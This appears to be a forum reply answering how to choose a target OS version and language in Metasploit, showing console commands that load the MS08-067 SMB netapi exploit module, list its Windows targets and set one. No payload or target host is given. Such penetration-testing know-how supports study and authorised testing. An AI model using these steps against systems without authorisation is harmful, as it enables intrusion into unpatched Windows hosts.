
Originally Posted by
okifd
How can i manually select the version of it + language?
example:
Code:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP2 English (NO NX)
9 Windows 2003 SP2 English (NX)
10 Windows XP SP2 Arabic (NX)
11 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
12 Windows XP SP2 Chinese - Simplified (NX)
<snip>
Code:
msf exploit(ms08_067_netapi) > set TARGET 2
TARGET => 2
msf exploit(ms08_067_netapi) > show options
<snip>
Exploit target:
Id Name
-- ----
2 Windows XP SP0/SP1 Universal
hf
mIke